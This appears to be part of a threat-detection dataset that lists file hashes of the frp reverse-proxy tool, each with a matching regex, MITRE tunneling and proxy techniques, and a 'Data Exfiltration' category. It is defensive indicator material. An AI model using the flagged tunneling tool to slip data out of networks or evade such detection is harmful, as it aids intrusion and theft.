"*60ee29ebb3683135c815b4e9b6681c92a445ac3f40e9302a70b65fca68ff5116*",".{0,1000}60ee29ebb3683135c815b4e9b6681c92a445ac3f40e9302a70b65fca68ff5116.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*618b1a0d2bfebc9bc3e59b4c39e67082a445e5aeaaaa0fec9eded436dd64a2d4*",".{0,1000}618b1a0d2bfebc9bc3e59b4c39e67082a445e5aeaaaa0fec9eded436dd64a2d4.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*61b4d21b669ceb671b298a4ed4aa3c70b33d6e3e4281f7417336a76f684424ca*",".{0,1000}61b4d21b669ceb671b298a4ed4aa3c70b33d6e3e4281f7417336a76f684424ca.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*62044b03a7bccb7e8f8f4f691f34838cd1160a643c0bb06ca8489e78d2d65897*",".{0,1000}62044b03a7bccb7e8f8f4f691f34838cd1160a643c0bb06ca8489e78d2d65897.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*62170484c4d450fa47d86ed8b1dd20659b22cd7bc5a36caab330f244d6ea4d97*",".{0,1000}62170484c4d450fa47d86ed8b1dd20659b22cd7bc5a36caab330f244d6ea4d97.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*629d2edde798217cc664abb52610531e8bfd089b54879139c66a148429897e11*",".{0,1000}629d2edde798217cc664abb52610531e8bfd089b54879139c66a148429897e11.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*63035108f37cc80d6043c1fcac50f8e856791a4fb8bcef0e792d97c88d8e35c5*",".{0,1000}63035108f37cc80d6043c1fcac50f8e856791a4fb8bcef0e792d97c88d8e35c5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*6387e119ac3d0e3ec269a4f6569372a57f78b0545d5af71a70c42e546b2d6dc0*",".{0,1000}6387e119ac3d0e3ec269a4f6569372a57f78b0545d5af71a70c42e546b2d6dc0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*662d62af7744b9b639b3473bbdd2c4c70dfa5ac5fe1d058d13ce3cc7ea059500*",".{0,1000}662d62af7744b9b639b3473bbdd2c4c70dfa5ac5fe1d058d13ce3cc7ea059500.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*6681551b9bb7311625be8f3a269c183b600e13966787a8b11a8f9e8595a3d66b*",".{0,1000}6681551b9bb7311625be8f3a269c183b600e13966787a8b11a8f9e8595a3d66b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*69c08bae93e16aaf57debbe2b10df6824f5dfef32ce21b5d57d750b0698999ee*",".{0,1000}69c08bae93e16aaf57debbe2b10df6824f5dfef32ce21b5d57d750b0698999ee.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*6a3e20b001ab57b066a52394ba2d992ae6d93b22260b0969307966fad6214692*",".{0,1000}6a3e20b001ab57b066a52394ba2d992ae6d93b22260b0969307966fad6214692.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*6abdb7353ae5562e16d28e1da142f5f97bd51964359901aafd694b4638f85739*",".{0,1000}6abdb7353ae5562e16d28e1da142f5f97bd51964359901aafd694b4638f85739.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*6add94e2916fd776bc2fd62a01fa6fd282f040e2f05ba42962e823eac821ae81*",".{0,1000}6add94e2916fd776bc2fd62a01fa6fd282f040e2f05ba42962e823eac821ae81.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*6bef9db4560b6c7da2def271f7bc5bf6988fafa3e654f8a2bfb589fd7d79b2db*",".{0,1000}6bef9db4560b6c7da2def271f7bc5bf6988fafa3e654f8a2bfb589fd7d79b2db.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*6c9628cb8382894dc0a928df8fcea9dad9cb763ff161e31f94f816443c7419e0*",".{0,1000}6c9628cb8382894dc0a928df8fcea9dad9cb763ff161e31f94f816443c7419e0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*6fe6b708ab65d61293fb7f1669a3dceab6d8a7d06f9f9b93db68025873f51c44*",".{0,1000}6fe6b708ab65d61293fb7f1669a3dceab6d8a7d06f9f9b93db68025873f51c44.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*70f57deb3ce57eb890104fe14d6fe442a815e095122a9c2b584e34d3c54f5563*",".{0,1000}70f57deb3ce57eb890104fe14d6fe442a815e095122a9c2b584e34d3c54f5563.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*7174a1328325da89ed6aabcf522131db9928222154e9607b0d5a2f7b2977ae93*",".{0,1000}7174a1328325da89ed6aabcf522131db9928222154e9607b0d5a2f7b2977ae93.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*718c0f0820f65782bc19af479f2406c9654fc564b9999a0936581b4ed1d91bb2*",".{0,1000}718c0f0820f65782bc19af479f2406c9654fc564b9999a0936581b4ed1d91bb2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*71a0f3137f02da4116ea2b7d134c38be86a1229cffb0b1dac4469b561ea35985*",".{0,1000}71a0f3137f02da4116ea2b7d134c38be86a1229cffb0b1dac4469b561ea35985.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*722d7c6b976d85f29acd429f1fd6289a6e8451a3e1815444404bd4b99eb553f7*",".{0,1000}722d7c6b976d85f29acd429f1fd6289a6e8451a3e1815444404bd4b99eb553f7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*72c007c9121974c0812eb2f98e26f987be28774b3175325d45596a555bfb811a*",".{0,1000}72c007c9121974c0812eb2f98e26f987be28774b3175325d45596a555bfb811a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*73f3e7037e5f06e8f6fc30aa47aabbc815b4173decdcab149c647126a4aa6370*",".{0,1000}73f3e7037e5f06e8f6fc30aa47aabbc815b4173decdcab149c647126a4aa6370.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*7402fc76816fd653bbe050a3f8a2dfd7c1363c980e2cc3dc369c60c3f0d502a7*",".{0,1000}7402fc76816fd653bbe050a3f8a2dfd7c1363c980e2cc3dc369c60c3f0d502a7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*74df509decd6953a77543ae8febcdc05379bb2bd0614ad2fe53a4a6cfac86caf*",".{0,1000}74df509decd6953a77543ae8febcdc05379bb2bd0614ad2fe53a4a6cfac86caf.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*754d66a918d3550c83e670a458f66954eec0521d6e76a20dd0a865992ad1b55e*",".{0,1000}754d66a918d3550c83e670a458f66954eec0521d6e76a20dd0a865992ad1b55e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*76c7a4f5e35f32b726c48fdd32e292f63c7b374ba019a28dc44b04140f03e6de*",".{0,1000}76c7a4f5e35f32b726c48fdd32e292f63c7b374ba019a28dc44b04140f03e6de.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*76d2a7bc7ceb5f542ed5be5208f68253261a36d1f4206fc4689296d9033a59a2*",".{0,1000}76d2a7bc7ceb5f542ed5be5208f68253261a36d1f4206fc4689296d9033a59a2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*76e5d42d4d2971de51de652417cfe38461ef9e18672e1070a1138910c8448a2f*",".{0,1000}76e5d42d4d2971de51de652417cfe38461ef9e18672e1070a1138910c8448a2f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*786985d9671f485f045b1039b98d312e5d97c85b38b116f5087e5c95d831e455*",".{0,1000}786985d9671f485f045b1039b98d312e5d97c85b38b116f5087e5c95d831e455.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*7946d13b2498410bf9fb0cc32fee7ea44bde8be438eb1b1bc67c440a3671589d*",".{0,1000}7946d13b2498410bf9fb0cc32fee7ea44bde8be438eb1b1bc67c440a3671589d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*795defca4853f7cded6625d792eae33b45987856b961a82c8b6cc44a8d0b3bc7*",".{0,1000}795defca4853f7cded6625d792eae33b45987856b961a82c8b6cc44a8d0b3bc7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*7a9fd341e0deb467ba0ab4913852adc965a0df2ba38e18ec80ab7ef61a9e99e8*",".{0,1000}7a9fd341e0deb467ba0ab4913852adc965a0df2ba38e18ec80ab7ef61a9e99e8.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*7b6c9cf91ad9d00385d47139ffc69c0c9d72270886dbdb4f71f599efaec2cb64*",".{0,1000}7b6c9cf91ad9d00385d47139ffc69c0c9d72270886dbdb4f71f599efaec2cb64.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*7bb651eec86e0126af3bd515235901a64b5490115defa10972e703c05bc65345*",".{0,1000}7bb651eec86e0126af3bd515235901a64b5490115defa10972e703c05bc65345.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*7c1416256f7f3637e0dfed99988d08282ae0866784f1eecd53a3639e1a942867*",".{0,1000}7c1416256f7f3637e0dfed99988d08282ae0866784f1eecd53a3639e1a942867.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*7c55322bb55e4085ab950711f0c3406a25f95573f618ed347e8f542ecf93cb78*",".{0,1000}7c55322bb55e4085ab950711f0c3406a25f95573f618ed347e8f542ecf93cb78.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*7c6208a3f7131802f24ad7bf7f02c760bba5c17443bdf328598d0758865f80df*",".{0,1000}7c6208a3f7131802f24ad7bf7f02c760bba5c17443bdf328598d0758865f80df.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*7d299b5695b0076b24e93928bad255f76c8352b5002fd459ef63c0199251abe9*",".{0,1000}7d299b5695b0076b24e93928bad255f76c8352b5002fd459ef63c0199251abe9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*7dba4f6e942502f0eca2ec37206671734eeb87c40a29f16b96ce14045da9e833*",".{0,1000}7dba4f6e942502f0eca2ec37206671734eeb87c40a29f16b96ce14045da9e833.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*7ebff99259931e26c3baf8dd78c1af671d73a6c91a1d6ec9107c0c225df76bf0*",".{0,1000}7ebff99259931e26c3baf8dd78c1af671d73a6c91a1d6ec9107c0c225df76bf0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*7fac327360b72613dec67583e4b939b65af0b88b676660821647b161ec2173fd*",".{0,1000}7fac327360b72613dec67583e4b939b65af0b88b676660821647b161ec2173fd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*7ff954d3f9f0d655be5f250ca50e8b065ddb8b4d3a1da0a55f740cc03301c6f5*",".{0,1000}7ff954d3f9f0d655be5f250ca50e8b065ddb8b4d3a1da0a55f740cc03301c6f5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*801a1ea2bf02b9ff657c34708918397bec61408bed216f6ed45889973ee09a01*",".{0,1000}801a1ea2bf02b9ff657c34708918397bec61408bed216f6ed45889973ee09a01.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*80228ba9bd43db42713f682032c0d4c2faa07ecb01be848bb57f6d51f24fa138*",".{0,1000}80228ba9bd43db42713f682032c0d4c2faa07ecb01be848bb57f6d51f24fa138.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*8141072eb367f6cc492bbcec66c0f08351398ba1a5b44e9f0a831b382ef866cd*",".{0,1000}8141072eb367f6cc492bbcec66c0f08351398ba1a5b44e9f0a831b382ef866cd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*81930048c93d8db07af024cd0355809248501dec0ce182a734d16e6bd48055a3*",".{0,1000}81930048c93d8db07af024cd0355809248501dec0ce182a734d16e6bd48055a3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*8355cecbe4792077c4977def67d9d10be79d0c9442aec7dc93cbdf9523387844*",".{0,1000}8355cecbe4792077c4977def67d9d10be79d0c9442aec7dc93cbdf9523387844.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*85cd761d170a2b9d567dcf7bd8c1a4aefa19aa9cfca048edd29483a196b42dcb*",".{0,1000}85cd761d170a2b9d567dcf7bd8c1a4aefa19aa9cfca048edd29483a196b42dcb.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*8805d70a692b0c5e20271214af085ffc3d8ea2176ce5dbe06fd6e4de59d8206f*",".{0,1000}8805d70a692b0c5e20271214af085ffc3d8ea2176ce5dbe06fd6e4de59d8206f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*886ac7c8c0e01bddcb808947f76a5f904572e337fa4023cce4bad71a7ae9ca1c*",".{0,1000}886ac7c8c0e01bddcb808947f76a5f904572e337fa4023cce4bad71a7ae9ca1c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*895b5c7ece8b458dff80ed790fc1633675a05fc9c4bd994ac89cf8e9d83bd32b*",".{0,1000}895b5c7ece8b458dff80ed790fc1633675a05fc9c4bd994ac89cf8e9d83bd32b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*8a0f1ef0b8723089613e2754d965ac9059eed027064bdd484f417fa6f5756d12*",".{0,1000}8a0f1ef0b8723089613e2754d965ac9059eed027064bdd484f417fa6f5756d12.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*8a222ae6ff9a59164b44aac7d3005e4d75bd97997c48a51e05b5d50dbe6983af*",".{0,1000}8a222ae6ff9a59164b44aac7d3005e4d75bd97997c48a51e05b5d50dbe6983af.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*8a5b86e7ea67bd1355ca5b9ddda60ecfdfb7c0b13cf06af71c1e72e88371016d*",".{0,1000}8a5b86e7ea67bd1355ca5b9ddda60ecfdfb7c0b13cf06af71c1e72e88371016d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*8ad8905b9296f3c26632f3bfc66302bc082b62295f6bbbb5b78e31d1e6649f26*",".{0,1000}8ad8905b9296f3c26632f3bfc66302bc082b62295f6bbbb5b78e31d1e6649f26.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
